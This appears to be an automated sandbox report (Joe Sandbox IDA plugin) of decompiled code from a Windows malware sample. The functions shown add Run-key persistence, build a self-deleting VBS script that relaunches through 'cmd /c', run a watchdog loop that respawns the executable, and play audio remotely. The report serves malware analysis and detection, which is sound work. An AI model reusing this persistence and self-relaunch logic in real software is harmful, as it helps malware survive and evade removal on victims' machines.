                    				E004042FC(_t134,  &_v700, L"On Error Resume Next\n", 0x46b928, _t251, _t67);
                    				E00401F09();
                    				_t252 = _t134;
                    				if(_t134 != 0) {
                    					_t218 = E004042FC(_t134,  &_v648, L"while fso.FileExists(\"", 0x46b928, _t252, E0040417E(_t134,  &_v620, L"On Error Resume Next\n", 0x46b928,  &_v524));
                    					E0040325D(E00403014(_t134,  &_v672, _t109, 0, 0x46b928, _t252, L"\")\n"));
                    					E00401F09();
                    					E00401F09();
                    					E00401F09();
                    				}
                    				_t237 = L"\"\n";
                    				E0040325D(E00403014(_t134,  &_v624, E00403014(_t134,  &_v648, E0040417E(_t134,  &_v668, _t218, 0x46b928, L"fso.DeleteFile \""), 0, 0x46b928, _t252,  &_v524), 0, 0x46b928, _t252, L"\"\n"));
                    				E00401F09();
                    				E00401F09();
                    				E00401F09();
                    				_t253 = _t134;
                    				if(_t134 != 0) {
                    					_t26 =  &_v692; // 0x466050
                    					L00408F79(_t134, _t26, 0, 0x46b928, L"wend\n");
                    				}
                    				_t221 = 0x46b928;
                    				_t78 = E004076DE(_t253);
                    				_t254 = _t78;
                    				if(_t78 != 0) {
                    					_t221 = E0040B7F1( &_v644, L"fso.DeleteFolder \"", 0x46b928, 0x4742f0);
                    					E0040325D(E00403014(0x4742f0,  &_v620, _t101, 0, 0x46b928, _t254, _t237));
                    					E00401F09();
                    					E00401F09();
                    				}
                    				_t79 = E0040417E(0x4742f0,  &_v548, _t221, 0x46b928, L"\"\"\", 0");
                    				E0040325D(E00403014(0x4742f0,  &_v628, E00402FA5( &_v652, E0040431D(0x4742f0,  &_v676, E0040417E(0x4742f0,  &_v576, _t221, 0x46b928, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0x46b928, _t254,  &_v0), _t79), 0, 0x46b928, _t254, "\n"));
                    				E00401F09();
                    				E00401F09();
                    				E00401F09();
                    				E00401F09();
                    				E00401F09();
                    				L00408F79(0x4742f0,  &_v704, 0, 0x46b928, L"fso.DeleteFile(Wscript.ScriptFullName)");
                    				_t92 = E00401F04( &_v612);
                    				_t93 = E0040247C();
                    				E00401F04( &_v708);
                    				if(E0041BE86(_t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", E00401F04( &_v596), 0x46b928, 0x46b928, 0) > 0x20) {
                    					ExitProcess(0);
                    				}
                    				E00401F09();
                    				E00401F09();
                    				return E00401F09();
                    			}
















































                    0x0040d229
                    0x0040d233
                    0x0040d23f
                    0x0040d246
                    0x0040d246
                    0x0040d24e
                    0x0040d254
                    0x0040d256
                    0x0040d256
                    0x0040d262
                    0x0040d270
                    0x0040d270
                    0x0040d27a
                    0x0040d27f
                    0x0040d285
                    0x0040d296
                    0x0040d29b
                    0x0040d2a1
                    0x0040d2a7
                    0x0040d2b5
                    0x0040d2ba
                    0x0040d2bb
                    0x0040d2c1
                    0x0040d2d2
                    0x0040d2d7
                    0x0040d2df
                    0x0040d2e7
                    0x0040d30e
                    0x0040d318
                    0x0040d31a
                    0x0040d326
                    0x0040d326
                    0x0040d339
                    0x0040d352
                    0x0040d35f
                    0x0040d364
                    0x0040d366
                    0x0040d369
                    0x0040d36e
                    0x0040d370
                    0x0040d377
                    0x0040d382
                    0x0040d382
                    0x0040d3a4
                    0x0040d3ae
                    0x0040d3bc
                    0x0040d3c2
                    0x0040d3cb
                    0x0040d3d5
                    0x0040d3da
                    0x0040d3dc
                    0x0040d404
                    0x0040d415
                    0x0040d41e
                    0x0040d427
                    0x0040d430
                    0x0040d430
                    0x0040d435
                    0x0040d46e
                    0x0040d477
                    0x0040d480
                    0x0040d489
                    0x0040d48e
                    0x0040d490
                    0x0040d497
                    0x0040d49b
                    0x0040d49b
                    0x0040d4a5
                    0x0040d4a9
                    0x0040d4ae
                    0x0040d4b0
                    0x0040d4c3
                    0x0040d4d4
                    0x0040d4dd
                    0x0040d4e6
                    0x0040d4e6
                    0x0040d4fc
                    0x0040d544
                    0x0040d54d
                    0x0040d556
                    0x0040d55f
                    0x0040d56b
                    0x0040d577
                    0x0040d585
                    0x0040d58f
                    0x0040d599
                    0x0040d5a6
                    0x0040d5b8
                    0x0040d5d9
                    0x0040d5d9
                    0x0040d5e3
                    0x0040d5ec
                    0x0040d607

                    APIs
                      • Part of subcall function 00412659: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F6D1), ref: 00412669
                      • Part of subcall function 00412659: WaitForSingleObject.KERNEL32(000000FF), ref: 0041267C
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D326
                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D339
                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D352
                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D382
                      • Part of subcall function 0040B721: TerminateThread.KERNEL32(0040A1A4,00000000,004742D8,pth_unenc,0040CEC1,004742C0,004742D8,?,pth_unenc), ref: 0040B730
                      • Part of subcall function 0040B721: UnhookWindowsHookEx.USER32(004740D8), ref: 0040B73C
                      • Part of subcall function 0040B721: TerminateThread.KERNEL32(0040A18E,00000000,?,pth_unenc), ref: 0040B74A
                      • Part of subcall function 0041BE86: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0046B928,00000000,00000000,0040D202,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041BEC5
                    • ShellExecuteW.SHELL32(00000000,open,00000000,0046B928,0046B928,00000000), ref: 0040D5CD
                    • ExitProcess.KERNEL32 ref: 0040D5D9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                    • String ID: CG$""", 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$L=G$On Error Resume Next$P`F$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                    • API String ID: 1861856835-3704294365
                    • Opcode ID: 08d54a89614d7700ce69ee50dd9ecf1c9958a6b83500ffc486bdb18e6303f945
                    • Instruction ID: 02f32a6a6ed0dac83c5448e5774f629d052c96429797f0f141efcb369707a104
                    • Opcode Fuzzy Hash: 08d54a89614d7700ce69ee50dd9ecf1c9958a6b83500ffc486bdb18e6303f945
                    • Instruction Fuzzy Hash: 6C91C4316042005AC315FB66D852AAF77A9AFD1309F50443FB14AA31E2FF7C9E49C69E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E0040CE9F() {
                    				short _v524;
                    				char _v548;
                    				char _v572;
                    				char _v576;
                    				char _v596;
                    				char _v600;
                    				void* _v604;
                    				char _v620;
                    				char _v624;
                    				void* _v628;
                    				char _v644;
                    				char _v648;
                    				char _v652;
                    				char _v668;
                    				char _v672;
                    				void* _v676;
                    				void* _t49;
                    				void* _t50;
                    				void* _t53;
                    				void* _t56;
                    				void* _t71;
                    				void* _t82;
                    				void* _t84;
                    				void* _t85;
                    				signed char _t123;
                    				signed char _t124;
                    				void* _t196;
                    				void* _t229;
                    				void* _t231;
                    				void* _t232;
                    				void* _t233;
                    
                    				E00412659();
                    				if( *0x474124 != 0) {
                    					E0040B721(0x4740d8);
                    				}
                    				_t229 =  *0x471d63 - 1; // 0x0
                    				if(_t229 == 0) {
                    					E00419529(_t196, _t229);
                    				}
                    				if( *0x471a85 != 0) {
                    					E0041BD26(E00401F04(0x473d4c), _t196);
                    				}
                    				_t214 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                    				_t231 =  *0x471b33 - 1; // 0x1
                    				if(_t231 == 0) {
                    					E004135D1(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401F04(0x4742a8));
                    				}
                    				_t232 =  *0x471b30 - 1; // 0x0
                    				if(_t232 == 0) {
                    					E004135D1(0x80000002, _t214, E00401F04(0x4742a8));
                    				}
                    				_t233 =  *0x471b31 - 1; // 0x0
                    				if(_t233 == 0) {
                    					E004135D1(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401F04(0x4742a8));
                    				}
                    				E004368A0(0,  &_v524, 0, 0x208);
                    				_t49 = E0040247C();
                    				_t50 = E00401FAB(0x474320);
                    				_t53 = E004132A6(E00401FAB(0x4742d8), "exepath",  &_v524, 0x208, _t50, _t49);
                    				_t234 = _t53;
                    				if(_t53 == 0) {
                    					GetModuleFileNameW(0,  &_v524, 0x208);
                    				}
                    				RegDeleteKeyA(0x80000001, E00401FAB(0x4742d8));
                    				_t56 = E004076DE(_t234);
                    				_t235 = _t56;
                    				if(_t56 != 0) {
                    					SetFileAttributesW(E00401F04(0x4742f0), 0x80);
                    				}
                    				_t123 =  ~(SetFileAttributesW( &_v524, 0x80));
                    				asm("sbb bl, bl");
                    				E00403014(_t123,  &_v548, E0041B6F3( &_v620, E0041B40D( &_v668)), 0, 0x46b928, _t235, L".vbs");
                    				E00401F09();
                    				E00401FD8();
                    				E0040431D(_t123,  &_v576, E00403014(_t123,  &_v672, E0040417E(_t123,  &_v620, _t60, 0x46b928, E0043BA8F(_t123,  &_v668, _t235, L"Temp")), 0, 0x46b928, _t235, "\\"), 0x46b928, _t235,  &_v548);
                    				E00401F09();
                    				E00401F09();
                    				_t71 = E0040417E(_t123,  &_v672, _t67, 0x46b928, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
                    				_t203 = L"On Error Resume Next\n";
                    				E004042FC(_t123,  &_v652, L"On Error Resume Next\n", 0x46b928, _t235, _t71);
                    				E00401F09();
                    				_t124 = _t123 & 0x00000001;
                    				_t236 = _t124;
                    				if(_t124 != 0) {
                    					_t203 = E004042FC(_t124,  &_v624, L"while fso.FileExists(\"", 0x46b928, _t236, E0040417E(_t124,  &_v596, L"On Error Resume Next\n", 0x46b928,  &_v524));
                    					E0040325D(E00403014(_t124,  &_v672, _t98, 0, 0x46b928, _t236, L"\")\n"));
                    					E00401F09();
                    					E00401F09();
                    					E00401F09();
                    				}
                    				E0040325D(E00403014(_t124,  &_v600, E00403014(_t124,  &_v672, E0040417E(_t124,  &_v620, _t203, 0x46b928, L"fso.DeleteFile \""), 0, 0x46b928, _t236,  &_v524), 0, 0x46b928, _t236, L"\"\n"));
                    				E00401F09();
                    				E00401F09();
                    				E00401F09();
                    				_t237 = _t124;
                    				if(_t124 != 0) {
                    					L00408F79(_t124,  &_v644, 0, 0x46b928, L"wend\n");
                    				}
                    				_t82 = E004076DE(_t237);
                    				_t238 = _t82;
                    				if(_t82 != 0) {
                    					_t36 =  &_v668; // 0x466050
                    					E0040325D(E00403014(_t124,  &_v596, E0040B7F1(_t36, L"fso.DeleteFolder \"", 0x46b928, 0x4742f0), 0, 0x46b928, _t238, L"\"\n"));
                    					E00401F09();
                    					E00401F09();
                    				}
                    				L00408F79(_t124,  &_v644, 0, 0x46b928, L"fso.DeleteFile(Wscript.ScriptFullName)");
                    				_t84 = E00401F04( &_v576);
                    				_t85 = E0040247C();
                    				E00401F04( &_v648);
                    				if(E0041BE86(_t85 + _t85, _t84, 0) != 0) {
                    					ShellExecuteW(0, L"open", E00401F04( &_v572), 0x46b928, 0x46b928, 0);
                    				}
                    				ExitProcess(0);
                    			}


































                    0x0040cea9
                    0x0040ceb5
                    0x0040cebc
                    0x0040cebc
                    0x0040cec4
                    0x0040ceca
                    0x0040cecc
                    0x0040cecc
                    0x0040ced8
                    0x0040cee6
                    0x0040cee6
                    0x0040cef0
                    0x0040cef5
                    0x0040cefb
                    0x0040cf0c
                    0x0040cf11
                    0x0040cf17
                    0x0040cf1d
                    0x0040cf2b
                    0x0040cf30
                    0x0040cf31
                    0x0040cf37
                    0x0040cf48
                    0x0040cf4d
                    0x0040cf5f
                    0x0040cf6e
                    0x0040cf76
                    0x0040cf98
                    0x0040cfa0
                    0x0040cfa2
                    0x0040cfae
                    0x0040cfae
                    0x0040cfc1
                    0x0040cfd5
                    0x0040cfe0
                    0x0040cfe2
                    0x0040cff1
                    0x0040cff1
                    0x0040d008
                    0x0040d00f
                    0x0040d02a
                    0x0040d034
                    0x0040d03d
                    0x0040d076
                    0x0040d080
                    0x0040d089
                    0x0040d097
                    0x0040d09d
                    0x0040d0a6
                    0x0040d0b0
                    0x0040d0b5
                    0x0040d0b5
                    0x0040d0b8
                    0x0040d0e0
                    0x0040d0f1
                    0x0040d0fa
                    0x0040d103
                    0x0040d10c
                    0x0040d10c
                    0x0040d149
                    0x0040d152
                    0x0040d15b
                    0x0040d164
                    0x0040d169
                    0x0040d16b
                    0x0040d176
                    0x0040d176
                    0x0040d184
                    0x0040d189
                    0x0040d18b
                    0x0040d198
                    0x0040d1b3
                    0x0040d1bc
                    0x0040d1c5
                    0x0040d1c5
                    0x0040d1d3
                    0x0040d1dd
                    0x0040d1e7
                    0x0040d1f4
                    0x0040d206
                    0x0040d21b
                    0x0040d21b
                    0x0040d222

                    APIs
                      • Part of subcall function 00412659: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F6D1), ref: 00412669
                      • Part of subcall function 00412659: WaitForSingleObject.KERNEL32(000000FF), ref: 0041267C
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742D8,?,pth_unenc), ref: 0040CFAE
                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040CFC1
                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742D8,?,pth_unenc), ref: 0040CFF1
                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742D8,?,pth_unenc), ref: 0040D000
                      • Part of subcall function 0040B721: TerminateThread.KERNEL32(0040A1A4,00000000,004742D8,pth_unenc,0040CEC1,004742C0,004742D8,?,pth_unenc), ref: 0040B730
                      • Part of subcall function 0040B721: UnhookWindowsHookEx.USER32(004740D8), ref: 0040B73C
                      • Part of subcall function 0040B721: TerminateThread.KERNEL32(0040A18E,00000000,?,pth_unenc), ref: 0040B74A
                      • Part of subcall function 0041B40D: GetCurrentProcessId.KERNEL32(00000000,76B7FBB0,00000000,?,?,?,?,0046B928,0040D016,.vbs,?,?,?,?,?,004742D8), ref: 0041B434
                    • ShellExecuteW.SHELL32(00000000,open,00000000,0046B928,0046B928,00000000), ref: 0040D21B
                    • ExitProcess.KERNEL32 ref: 0040D222
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                    • String ID: CG$")$.vbs$L=G$On Error Resume Next$P`F$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                    • API String ID: 3797177996-4036317255
                    • Opcode ID: 1a209c8778a6724b52f0b0a893bf8f07f00328cac257381b925646c346162a7c
                    • Instruction ID: 80212714a34c8f82e84f0a78598c3206a8812b0645137854677bece382bd3d39
                    • Opcode Fuzzy Hash: 1a209c8778a6724b52f0b0a893bf8f07f00328cac257381b925646c346162a7c
                    • Instruction Fuzzy Hash: 6D81A0716042005BC715FB22D8929AF77A9AFD0309F10443FB586671E2EF7C9E49C69E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E0041227E() {
                    				long _v8;
                    				char _v32;
                    				short _v556;
                    				short _v1076;
                    				short _v1596;
                    				CHAR* _t24;
                    				void* _t26;
                    				void* _t27;
                    				void* _t30;
                    				int _t32;
                    				long _t38;
                    				int _t40;
                    				int _t42;
                    				long _t51;
                    				int _t53;
                    				void* _t56;
                    				int _t58;
                    				void* _t69;
                    				int _t71;
                    				int _t72;
                    				int _t73;
                    				long _t74;
                    				void* _t112;
                    				void* _t114;
                    				void* _t116;
                    				void* _t119;
                    
                    				_v8 = _t74;
                    				_t24 = E00401FAB(0x474400);
                    				_t72 = 0;
                    				if(CreateMutexA(0, 1, _t24) != 0) {
                    					_t26 = E0040247C();
                    					_t27 = E00401FAB(0x474320);
                    					_t30 = E004132A6(E00401FAB(0x4742d8), "exepath",  &_v556, 0x208, _t27, _t26);
                    					_t119 = _t119 + 0x14;
                    					if(_t30 != 0) {
                    						E004020DF(0,  &_v32);
                    						_t32 = E0041BF1A( &_v32);
                    						_push(0);
                    						__eflags = _t32;
                    						if(_t32 == 0) {
                    							L2:
                    							ExitProcess();
                    						}
                    						CreateFileW( &_v556, 0x80000000, 1, 0, 3, 0x80, ??);
                    						_t114 = OpenProcess(0x100000, 0, _v8);
                    						WaitForSingleObject(_t114, 0xffffffff);
                    						CloseHandle(_t114);
                    						_t38 = GetCurrentProcessId();
                    						_t40 = E00413425(0x4742d8, E00401FAB(0x4742d8), "WDH", _t38);
                    						__eflags = _t40;
                    						if(_t40 == 0) {
                    							goto L1;
                    						}
                    						_t112 = ShellExecuteW;
                    						do {
                    							_t42 = PathFileExistsW( &_v556);
                    							__eflags = _t42;
                    							_t43 =  &_v556;
                    							if(_t42 != 0) {
                    								L13:
                    								ShellExecuteW(_t72, L"open", _t43, _t72, _t72, 1);
                    								L14:
                    								do {
                    									_t73 = E004130F7(E00401FAB(0x4742d8), "WD",  &_v8);
                    									__eflags = _t73;
                    									if(_t73 == 0) {
                    										Sleep(0x1f4);
                    									} else {
                    										E00413557(E00401FAB(0x4742d8), __eflags, "WD");
                    									}
                    									__eflags = _t73;
                    								} while (_t73 == 0);
                    								goto L19;
                    							}
                    							_t56 = E0040247C();
                    							E00401FAB( &_v32);
                    							_t58 = E0041BE86(_t56,  &_v556, _t72);
                    							__eflags = _t58;
                    							if(_t58 == 0) {
                    								E004368A0(_t112,  &_v1596, _t72, 0x208);
                    								_t119 = _t119 + 0xc;
                    								GetTempPathW(0x104,  &_v1596);
                    								GetTempFileNameW( &_v1596, L"temp_", _t72,  &_v1076);
                    								lstrcatW( &_v1076, L".exe");
                    								_t69 = E0040247C();
                    								E00401FAB( &_v32);
                    								_t71 = E0041BE86(_t69,  &_v1076, _t72);
                    								__eflags = _t71;
                    								if(_t71 == 0) {
                    									goto L14;
                    								}
                    								_t43 =  &_v1076;
                    								goto L13;
                    							}
                    							_t43 =  &_v556;
                    							goto L13;
                    							L19:
                    							_t72 = 0;
                    							_t116 = OpenProcess(0x100000, 0, _v8);
                    							WaitForSingleObject(_t116, 0xffffffff);
                    							CloseHandle(_t116);
                    							_t51 = GetCurrentProcessId();
                    							_t53 = E00413425(0x4742d8, E00401FAB(0x4742d8), "WDH", _t51);
                    							__eflags = _t53;
                    						} while (_t53 != 0);
                    						goto L1;
                    					}
                    					_push(0);
                    					goto L2;
                    				}
                    				L1:
                    				_push(1);
                    				goto L2;
                    			}





























                    0x00412289
                    0x00412292
                    0x0041229a
                    0x004122a5
                    0x004122b6
                    0x004122be
                    0x004122e3
                    0x004122e8
                    0x004122ed
                    0x004122f5
                    0x00412303
                    0x00412308
                    0x00412309
                    0x0041230b
                    0x004122a9
                    0x004122a9
                    0x004122a9
                    0x00412323
                    0x00412338
                    0x0041233d
                    0x00412344
                    0x0041234a
                    0x0041235f
                    0x00412366
                    0x00412368
                    0x00000000
                    0x00000000
                    0x0041236e
                    0x00412374
                    0x0041237b
                    0x00412381
                    0x00412383
                    0x00412389
                    0x0041243f
                    0x0041244a
                    0x0041244c
                    0x00412451
                    0x00412468
                    0x0041246c
                    0x0041246e
                    0x0041248b
                    0x00412470
                    0x0041247e
                    0x00412483
                    0x00412491
                    0x00412491
                    0x00000000
                    0x00412451
                    0x00412394
                    0x0041239e
                    0x004123a7
                    0x004123ae
                    0x004123b0
                    0x004123ca
                    0x004123cf
                    0x004123de
                    0x004123f8
                    0x0041240a
                    0x0041241b
                    0x00412425
                    0x0041242e
                    0x00412435
                    0x00412437
                    0x00000000
                    0x00000000
                    0x00412439
                    0x00000000
                    0x00412439
                    0x004123b2
                    0x00000000
                    0x00412495
                    0x00412498
                    0x004124a6
                    0x004124ab
                    0x004124b2
                    0x004124b8
                    0x004124d0
                    0x004124d7
                    0x004124d7
                    0x00000000
                    0x004124df
                    0x004122ef
                    0x00000000
                    0x004122ef
                    0x004122a7
                    0x004122a7
                    0x00000000

                    APIs
                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,X2},00000003), ref: 0041229D
                    • ExitProcess.KERNEL32(00000000), ref: 004122A9
                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412323
                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412332
                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041233D
                    • CloseHandle.KERNEL32(00000000), ref: 00412344
                    • GetCurrentProcessId.KERNEL32 ref: 0041234A
                    • PathFileExistsW.SHLWAPI(?), ref: 0041237B
                    • GetTempPathW.KERNEL32(00000104,?), ref: 004123DE
                    • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004123F8
                    • lstrcatW.KERNEL32(?,.exe), ref: 0041240A
                      • Part of subcall function 0041BE86: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0046B928,00000000,00000000,0040D202,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041BEC5
                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041244A
                    • Sleep.KERNEL32(000001F4), ref: 0041248B
                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004124A0
                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004124AB
                    • CloseHandle.KERNEL32(00000000), ref: 004124B2
                    • GetCurrentProcessId.KERNEL32 ref: 004124B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                    • String ID: CG$.exe$WDH$X2}$exepath$open$temp_
                    • API String ID: 2649220323-1679490752
                    • Opcode ID: 6d6f7dc543159c885972ca6846e7c77a7240c2d2a563c2848b3e4b367fee0463
                    • Instruction ID: c2928b800a279f2b4b39e5059df7fcfc2a9e538c65adf4bf97af49ddc7ab8840
                    • Opcode Fuzzy Hash: 6d6f7dc543159c885972ca6846e7c77a7240c2d2a563c2848b3e4b367fee0463
                    • Instruction Fuzzy Hash: 35519371A00715ABDB10ABA09C4AEFE336C9B44715F1041ABF505F72D2EF7C8E858A5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E0041AADC(void* __ecx, void* __edx, char _a4) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				void* _v128;
                    				char _v176;
                    				char _v192;
                    				void* _v216;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t23;
                    				void* _t26;
                    				void* _t41;
                    				long _t45;
                    				void* _t61;
                    				void* _t65;
                    				void* _t108;
                    				void* _t110;
                    				void* _t112;
                    				void* _t114;
                    
                    				_t101 = __edx;
                    				_t114 =  &_v124;
                    				_t108 = __ecx;
                    				_t110 = __edx;
                    				if(E0041AD31( &_a4, __ecx, __ecx) == 0xffffffff) {
                    					_t61 = E00401F04( &_a4);
                    					_t101 = 0x30;
                    					E00401F13( &_a4, 0x30, _t110, E0040D83D( &_v124, 0x30, _t61));
                    					E00401F09();
                    				}
                    				_t23 = E0040247C();
                    				_t119 = _t23;
                    				if(_t23 == 0) {
                    					__eflags = PathFileExistsW(E00401F04( &_a4));
                    					if(__eflags != 0) {
                    						goto L4;
                    					} else {
                    						E00402093(_t65, _t114 - 0x18, _t101, _t112, 0x465094);
                    						_push(0xa8);
                    						E00404AA1(0x474968, _t101, __eflags);
                    					}
                    				} else {
                    					E0041BF87(_t110, E00401F04( &_a4));
                    					L4:
                    					_t26 = E0041B6F3( &_v28, _t108);
                    					_t106 = E00402FA5( &_v124, E00403014(_t65,  &_v76, E0040B7F1( &_v52, L"open \"", _t112,  &_a4), _t108, _t112, _t119, L"\" type "), _t26);
                    					E00403014(_t65,  &_v100, _t30, _t108, _t112, _t119, L" alias audio");
                    					E00401F09();
                    					E00401F09();
                    					E00401F09();
                    					E00401F09();
                    					mciSendStringW(E00401F04( &_v100), 0, 0, 0);
                    					mciSendStringA("play audio", 0, 0, 0);
                    					_t115 = _t114 - 0x18;
                    					E00402093(0, _t114 - 0x18, _t30, _t112, 0x465094);
                    					_push(0xa9);
                    					E00404AA1(0x474968, _t106, 0);
                    					_t41 = CreateEventA(0, 1, 0, 0);
                    					while(1) {
                    						L5:
                    						 *0x473ad4 = _t41;
                    						while(1) {
                    							_t121 = _t41;
                    							if(_t41 == 0) {
                    								break;
                    							}
                    							__eflags =  *0x473ad1; // 0x0
                    							if(__eflags != 0) {
                    								mciSendStringA("pause audio", 0, 0, 0);
                    								 *0x473ad1 = 0;
                    							}
                    							__eflags =  *0x473ad0; // 0x0
                    							if(__eflags != 0) {
                    								mciSendStringA("resume audio", 0, 0, 0);
                    								 *0x473ad0 = 0;
                    							}
                    							mciSendStringA("status audio mode",  &_v176, 0x14, 0);
                    							_t45 = E0043F6E0( &_v192, "stopped");
                    							__eflags = _t45;
                    							if(_t45 == 0) {
                    								SetEvent( *0x473ad4);
                    							}
                    							__eflags = WaitForSingleObject( *0x473ad4, 0x1f4);
                    							if(__eflags != 0) {
                    								_t41 =  *0x473ad4; // 0x0
                    							} else {
                    								CloseHandle( *0x473ad4);
                    								_t41 = 0;
                    								goto L5;
                    							}
                    						}
                    						mciSendStringA("stop audio", 0, 0, 0);
                    						mciSendStringA("close audio", 0, 0, 0);
                    						E00402093(0, _t115 - 0x18, _t106, 0x474968, 0x465094);
                    						_push(0xaa);
                    						E00404AA1(0x474968, _t106, _t121);
                    						E00401F09();
                    						goto L19;
                    					}
                    				}
                    				L19:
                    				return E00401F09();
                    			}


























                    0x0041aadc
                    0x0041aadc
                    0x0041aae4
                    0x0041aae6
                    0x0041aaf8
                    0x0041ab01
                    0x0041ab07
                    0x0041ab1b
                    0x0041ab24
                    0x0041ab24
                    0x0041ab2b
                    0x0041ab37
                    0x0041ab39
                    0x0041ac29
                    0x0041ac2b
                    0x00000000
                    0x0041ac31
                    0x0041ac3b
                    0x0041ac40
                    0x0041ac4a
                    0x0041ac4a
                    0x0041ab3f
                    0x0041ab48
                    0x0041ab4d
                    0x0041ab58
                    0x0041ab92
                    0x0041ab98
                    0x0041aba2
                    0x0041abab
                    0x0041abb4
                    0x0041abbd
                    0x0041abd1
                    0x0041abe5
                    0x0041abe7
                    0x0041abf2
                    0x0041abfc
                    0x0041ac03
                    0x0041ac0d
                    0x0041ac13
                    0x0041ac13
                    0x0041ac13
                    0x0041ace1
                    0x0041ace1
                    0x0041ace3
                    0x00000000
                    0x00000000
                    0x0041ac54
                    0x0041ac5a
                    0x0041ac64
                    0x0041ac66
                    0x0041ac66
                    0x0041ac6c
                    0x0041ac72
                    0x0041ac7c
                    0x0041ac7e
                    0x0041ac7e
                    0x0041ac91
                    0x0041ac9d
                    0x0041aca4
                    0x0041aca6
                    0x0041acae
                    0x0041acae
                    0x0041acc5
                    0x0041acc7
                    0x0041acdc
                    0x0041acc9
                    0x0041accf
                    0x0041acd5
                    0x00000000
                    0x0041acd5
                    0x0041acc7
                    0x0041acf1
                    0x0041acfb
                    0x0041ad03
                    0x0041ad08
                    0x0041ad0f
                    0x0041ad18
                    0x00000000
                    0x0041ad18
                    0x0041ac13
                    0x0041ad1d
                    0x0041ad30

                    APIs
                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041ABD1
                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041ABE5
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465094), ref: 0041AC0D
                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EC8,00000000), ref: 0041AC23
